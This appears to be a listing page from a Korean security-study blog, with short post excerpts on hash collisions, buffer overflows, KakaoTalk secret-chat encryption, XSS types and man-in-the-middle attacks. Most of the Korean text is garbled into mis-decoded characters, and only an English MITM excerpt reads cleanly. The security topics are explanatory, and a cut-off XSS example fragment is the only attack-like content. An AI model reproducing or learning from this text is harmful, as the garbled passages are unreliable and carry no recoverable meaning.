๋ค๋ฅธ ๋ฐ์ดํฐ๋ฅผ ์ ๋ ฅํด๋ ํด์ ๊ฒฐ๊ณผ๊ฐ์ด ๊ฐ์ ์ ์์. - ์ด๋ฅผ ์ถฉ๋(Collision)์ด๋ผ ํจ. * ์ถฉ๋์ด ์์ฃผ ์ผ์ด๋๋ ํด.. Security Study/System Security 2015. 9. 3. BOF(buffer overflow) Security Study/System 2015. 9. 3. ์นด์นด์คํก ๋น๋ฐ๋ํ ๋ถ์ Certificate Pinning; SSL PinningEnd-to-end EncryptionPerfect Forward Secrecy Cain & Abel์ ํตํ MITM ๊ณต๊ฒฉCertificate PinningRSA ์๊ณ ๋ฆฌ์ฆ, AES๋ฅผ ํตํ์ฌ ํค๋ฅผ ์ฃผ๊ณ ๋ฐ์์ก์ ์-> AES ํค๋ก ์ํธํ๋ ๋ด์ฉ์ ์๋ฒ์ ๋ณด๋์๋ฒ์์ ๋ณตํธํํ์ฌ ๋ด์ฉ์ ์ ์ฅ, AES ํค๋ก ์ํธํ ํ ์์ ์์๊ฒ ๋ณด๋End-to-end EncryptionHandshake ํ ๊ฐ์์ ์ ๋ณด๋ฅผ ์ด์ฉํ์ฌ ๋ณตํธํPerfect Forward SecrecySSL Pinning, ํค๊ฐ๋ง ์๋ฉด ๋ซ๋ฆฐ๋ค!์ค์๊ฐ ๋/๊ฐ์ฒญ์ ๋ถ๊ฐ์ ๋ถ์ ์ ์ฑ ์ผ๋ก ์ธํด์์ ๋ฐ์ดํฐ ์์ง์ด ์๋ค๋ฉด ๋ ๋ชจ๋ฅผ๊น.์นดํก ์๋ฒ์ ๋ฐ์ดํฐ๋ฅผ ์ ์ฅํ๋ ์ด์ ?- 3์ผ ~ ์ผ์ฃผ์ผ; ์๋๋ฐฉ์ด ๋ฐ์ง ๋ชปํ์ ๋.. Security Study/System 2015. 9. 3. XSS(ํฌ๋ก์ค ์ฌ์ดํธ ์คํฌ๋ฆฝํธ)? 1. XSS๋? Cross Site Scripting(XSS)์ ์ฝ์์ด๋ฉฐ, ํน์ ํ์ด์ง์ ์คํฌ๋ฆฝํธ๋ฅผ ๋ฃ์ด์ ์ธ์ ์ ๊ฐ๋ก์ฑ๊ฑฐ๋ ๊ณต๊ฒฉ์๊ฐ ์๋ํ๋๋ก ํ๋ํ๋๋ก ๋ง๋๋ ์น ๊ณต๊ฒฉ์ ์ผ์ข ์ด๋ค. XSS๋ ํฌ๊ฒ Reflected XSS์ Stored XSS๋ก ๋ถ๋ฅํ ์๊ฐ ์๋ค.Reflected XSS๋ ๊ณต๊ฒฉ ์คํฌ๋ฆฝํธ๊ฐ ์ฝ์ ๋ URL์ ์ฌ์ฉ์๊ฐ ์ฝ๊ฒ ํ์ธํ ์ ์๋๋ก ๋ณํ์ํจ ํ ์ด๋ฉ์ผ์ด๋ ๋ค๋ฅธ ์น์ฌ์ดํธ ๋ฑ์ ํด๋ฆญ์ ์ ๋ํ๋๋ก ํ๋ ๋ฐฉ๋ฒ์ด๋ค.Stored XSS๋ ์คํฌ๋ฆฝํธ๋ฅผ ์ผ๋ฐ ๊ฒ์ํ ๋ฑ์ ๊ณต๊ฒฉ์๊ฐ ๊ฒ์๊ธ์ ์คํฌ๋ฆฝํธ๋ฅผ ์ฝ์ ํ์ฌ ์ฌ์ฉ์๊ฐ ํด๋น ํ์ด์ง๋ฅผ ํด๋ฆญํ๋ ์๊ฐ ์คํฌ๋ฆฝํธ๊ฐ ์คํํ๋๋ก ํ๋ ๋ฐฉ๋ฒ์ด๋ค. 2. XSS๋ฅผ ์ด์ฉํ ๊ณต๊ฒฉ ์ ํ 4๊ฐ์ง ใฑ. ๋ฃ๋ ๋ด์ฉ์ ๋ฐ๋ผ ๋ค์ํ ๊ธฐ๋ฒ์ ๊ตฌ์ฌํ ์ ์๋ค. ex) ">http://s.. Security Study/Web 2015. 9. 3. What Is A Man In The Middle Attack? ์๋ณธ What Is A Man In The Middle Attack? In a sense, a man-in-the-middle attack (MITM) is like eavesdropping. Data is sent from point A (computer) to point B (server/website), and an attacker can get in-between these transmissions. They then set up tools programmed to “listen in” on transmissions, intercept data that is specifically targeted as valuable, and capture the data. Sometimes this data can .. Security Study/Web 2015. 9. 3. What Is A Man In The Middle Attack? โ . ์๋ก ์ ์ธ๊ณ์ ์ผ๋ก ๋ค์ํ ํดํน ๊ธฐ๋ฒ๋ค์ด ์กด์ฌํ๊ณ ์๋ค ์น์ ํตํ ์ ์ฑ ํ์์ . ๋ค์ํ ์ดํ๋ฆฌ์ผ์ด์ ์ ํ๊น์ผ๋ก ํ์ฌ ์ ์ฑ์ฝ๋ ์ ํฌ ํ์๊ฐ ์ด์ด์ง๊ณ ์๋ค. ๋ํ ๊ณต์ ๊ธฐ ์ทจ์ฝ์ ๋ฑ์ ์ด์ฉํ ๊ณต๊ฒฉ ๋๋ ์๋ฒ๊ฐ์ ํต์ ์ ๊ฐ์ด๋ฐ์์ ๋์ฒญํ๋ ๋ฏํ ๊ณต๊ฒฉ ๋ฑ์ด ๋ง๋ค. ์ค๋๋ ์ค๊ฐ์ ๊ณต๊ฒฉ์ ์ํ ๊ด๊ณต์ ์ ์ฉํ์ฌ ๋ฑ์ ์ฅ์ ํ ์ ์์ผ๋ฉฐ ์ดํ , , ๊ณต๊ฒฉ์๊ฐ ์ํ๋ ์ ๋ง๋๋ก ์ ๋ณด๋ฅผ ๋ค์ ์์ ์๊ฒ ๋๊ณ ์ ๋ณด ํ์ทจ ์ด์ธ์๋ ๋ค์ํ ๋ฐฉ๋ฒ์ผ๋ก ์ด์ฉํ ์ ์๋ค. ํด๋น ๋ฌธ์์์๋ ์์ ๊ฐ์ ์ํ์ ์ธ ์ค๊ฐ์๊ณต๊ฒฉ ๊ธฐ์ ์ ์ตํ๊ธฐ ์ด์ ์ ์ด๋ฅผ ๊ณต๋ถํ๊ณ ์์ฉํ๋ฉฐ ์ฐ๊ตฌํ ์ ์๋ ์ค๊ฐ์ ๊ณต๊ฒฉ์ ๋ํ ์ค๋ช ๊ณผ ์๋ฐฉ๋ฒ์ ์๊ฐ ํ๋ค. โ ก. ๋ณธ๋ก -What Is A Man In The Middle Attack? ์ค๊ฐ์ ๊ณต๊ฒฉ ๋ ์ด๋ค ์๋ฏธ์์๋.. Security Study/Web 2015. 9. 3. ์ด์ 1 ยทยทยท 8 9 10 11 12 ๋ค์ 728x90 ๋ฐ์ํ